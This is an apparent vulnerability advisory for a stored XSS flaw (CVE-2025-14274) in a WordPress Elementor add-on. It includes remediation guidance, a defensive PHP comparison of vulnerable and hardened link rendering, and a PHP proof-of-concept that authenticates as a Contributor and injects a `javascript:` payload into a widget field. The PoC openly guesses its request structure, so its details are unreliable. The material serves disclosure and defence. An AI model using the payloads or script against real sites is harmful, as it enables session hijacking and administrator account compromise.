Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14274: Unlimited Elements for Elementor <= 2.0.1 – Authenticated (Contributor+) Stored Cross-Site Scripting via Border Hero Widget (unlimited-elements-for-elementor)

Severity: Medium (CVSS 5.4)
CWE: CWE-79
Vulnerable Version: 2.0.1
Patched Version:
Disclosed: February 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14274 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Unlimited Elements for Elementor WordPress plugin, affecting versions up to and including 2.0.1. The vulnerability resides in the Border Hero widget’s Button Link field. An attacker with Contributor-level privileges or higher can inject malicious JavaScript payloads that are stored and executed when a user views the compromised page. The CVSS score of 5.4 (Medium) reflects the requirement for user interaction and authenticated access.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping of user-supplied URLs. The CWE-79 classification confirms a failure to neutralize user input before it is placed in web page output, and the vulnerability description locates the issue in the Border Hero widget’s Button Link field. Without access to source code, Atomic Edge infers that the plugin likely accepts URL input via an Elementor widget control, applies inadequate sanitization (or none at all) with `sanitize_url()` or `esc_url()`, and then outputs the value in the frontend render function without escaping it via `esc_attr()` or `esc_url()`.

The exploitation method requires an authenticated attacker with at least Contributor-level permissions. The attacker would edit or create a post or page using the Elementor page builder. They would add the vulnerable Border Hero widget to the layout. Within the widget’s settings panel, the attacker would inject a JavaScript payload into the Button Link field. A typical payload would be `javascript:alert(document.domain)`. Upon saving the post, the malicious script is stored in the post’s metadata. The script executes in the browser of any user who views the page containing the compromised widget, including administrators.

Remediation requires proper input validation and output escaping. The patched version (2.0.2) likely implemented a combination of WordPress core sanitization functions. For the Button Link field, the fix should validate the input as a proper URL using `sanitize_url()` and then escape it on output with `esc_url()`. If the field must accept schemes other than `http`/`https` (such as `mailto:`), they should be checked against a strict allowlist rather than accepted freely, since attribute escaping alone does not neutralize a `javascript:` URL. The Elementor widget control definition should also specify a `Sanitizer` callback to filter input at the point of entry.
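The two render paths discussed in the root-cause and remediation paragraphs above, the vulnerable one and the hardened one, as an added PHP example that is not the plugin's code and not part of the original advisory. The function names, the `button_link` setting key and the `ue-border-hero-btn` class are assumptions; the protocol allowlist stands in for WordPress's `esc_url()` so that the file runs outside WordPress.

```php
<?php
declare(strict_types=1);

// Added example, not the plugin's code. "button_link", "ue-border-hero-btn"
// and the function names are assumptions chosen for illustration.

/**
 * Vulnerable pattern: the stored setting lands in href unchanged.
 * "javascript:alert(document.domain)" becomes a live script URL, and a
 * double quote in the value breaks out of the attribute altogether.
 */
function render_button_vulnerable(array $settings): string
{
    $href = (string) ($settings['button_link'] ?? '');
    return '<a class="ue-border-hero-btn" href="' . $href . '">Read more</a>';
}

/**
 * Protocol allowlist in the spirit of WordPress's esc_url(): http, https,
 * mailto and tel are accepted, as are relative and scheme-relative paths.
 * Any other scheme (javascript:, data:, vbscript:, ...) yields '' so the
 * caller can render the button inert.
 */
function sanitize_button_link(string $raw): string
{
    // Browsers skip ASCII control characters and whitespace while reading a
    // scheme, so drop them first; otherwise "java\tscript:" looks schemeless.
    $url = (string) preg_replace('/[\x00-\x20\x7f]/', '', $raw);
    if ($url === '') {
        return '';
    }
    // Relative references carry no scheme and cannot run script.
    if (in_array($url[0], ['/', '#', '?'], true)) {
        return $url;
    }
    if (!preg_match('/^([a-z][a-z0-9+.\-]*):/i', $url, $m)) {
        return $url; // no scheme at all: a plain relative path such as "about/"
    }
    $allowed = ['http', 'https', 'mailto', 'tel'];
    return in_array(strtolower($m[1]), $allowed, true) ? $url : '';
}

/**
 * Hardened pattern: validate the scheme, then escape for attribute context.
 * In a WordPress plugin the last step is esc_url() (or esc_attr()).
 */
function render_button_hardened(array $settings): string
{
    $href = sanitize_button_link((string) ($settings['button_link'] ?? ''));
    if ($href === '') {
        // Rejected or empty link: keep the element but make it go nowhere.
        $href = '#';
    }
    $safe = htmlspecialchars($href, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a class="ue-border-hero-btn" href="' . $safe . '">Read more</a>';
}

// Constructed sample settings, including the payload quoted in the analysis.
$samples = [
    'https://example.com/pricing',
    'mailto:sales@example.com',
    '/about/',
    'javascript:alert(document.domain)',
    "java\tscript:alert(1)",
    'data:text/html,<script>alert(1)</script>',
    'https://example.com/"onmouseover="alert(1)',
];
foreach ($samples as $link) {
    $settings = ['button_link' => $link];
    echo "input:      " . addcslashes($link, "\0..\37") . "\n";
    echo "vulnerable: " . render_button_vulnerable($settings) . "\n";
    echo "hardened:   " . render_button_hardened($settings) . "\n\n";
}
```

Run it with `php example.php` and compare the two output lines per sample: the scheme allowlist is what stops `javascript:` and `data:` (they are perfectly valid attribute text, so escaping alone leaves them executable), while `htmlspecialchars()` is what stops the quote-based attribute breakout. A real plugin should do both at render time, and additionally sanitize the control value when it is saved, so that a payload never reaches post metadata in the first place.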

Successful exploitation leads to stored XSS attacks. The injected scripts execute within the context of the victim’s session. This can result in session hijacking, unauthorized actions performed on behalf of the victim (like changing passwords or creating new admin users), defacement of the site, or theft of sensitive data from the page. The impact is elevated because Contributor-level users, who typically cannot publish posts, can still create drafts reviewed by higher-privileged users, potentially compromising administrator accounts.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14274 - Unlimited Elements for Elementor <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Border Hero Widget
/**
 * Proof of Concept for CVE-2025-14274.
 * Assumptions based on metadata:
 * 1. Exploitation occurs via the Elementor editor interface.
 * 2. The attack vector is the 'Button Link' field in the 'Border Hero' widget.
 * 3. Contributor-level authentication is required.
 * This script simulates the attack by logging in and attempting to save a post with a malicious widget.
 * Note: Without the actual plugin code, this PoC uses educated guesses for parameter names and data structure.
 */

$target_url = 'http://vulnerable-wordpress-site.local';
$username = 'contributor_user';
$password = 'contributor_pass';

// Payload to inject into the Button Link field
$malicious_link = 'javascript:alert(`Atomic Edge XSS: `+document.domain)';

// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve_14274_cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_14274_cookie.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Step 1: Authenticate as a Contributor
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
$response = curl_exec($ch);

// Check for login success by looking for a dashboard redirect or absence of login form
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('[-] Authentication failed. Check credentials.');
}
echo "[+] Authentication successful.\n";

// Step 2: Create a new post draft via the REST API to get a post ID and nonce
// Contributor users can create drafts via REST API (if permissions allow).
$api_url = $target_url . '/wp-json/wp/v2/posts';
$post_data = json_encode([
    'title' => 'Test Post - CVE-2025-14274',
    'status' => 'draft',
    'content' => 'Post content.'
]);
curl_setopt($ch, CURLOPT_URL, $api_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
$response = curl_exec($ch);
$post_info = json_decode($response, true);
if (!isset($post_info['id'])) {
    die('[-] Failed to create draft post via REST API.');
}
$post_id = $post_info['id'];
echo '[+] Created draft post ID: ' . $post_id . "\n";

// Step 3: Simulate saving the post with Elementor containing the malicious widget.
// This step is highly speculative without the exact Elementor save structure.
// A real attack would use the Elementor editor AJAX endpoint.
$elementor_save_url = $target_url . '/wp-admin/admin-ajax.php';
// Assumed AJAX action for saving Elementor data. This is a common pattern.
$save_fields = [
    'action' => 'elementor_ajax',
    'actions' => json_encode([
        'action' => 'save_builder',
        'data' => [
            'post_id' => $post_id,
            'data' => [
                'elements' => [
                    [
                        'id' => 'some_element_id',
                        'elType' => 'widget',
                        'settings' => [
                            // Assumed widget type and field name based on description
                            '__widgetType' => 'border-hero',
                            'button_link' => $malicious_link // Injected payload
                        ],
                        'widgetType' => 'border-hero'
                    ]
                ]
            ]
        ]
    ])
];
curl_setopt($ch, CURLOPT_URL, $elementor_save_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($save_fields));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
$response = curl_exec($ch);

if (strpos($response, 'success') !== false) {
    echo "[+] Payload injected successfully.\n";
    echo '[+] Visit the draft post at: ' . $target_url . '/?p=' . $post_id . " to trigger the XSS.\n";
} else {
    echo "[-] Payload injection may have failed. AJAX structure might differ.\n";
    echo '[-] Raw response: ' . $response . "\n";
}

curl_close($ch);
?>
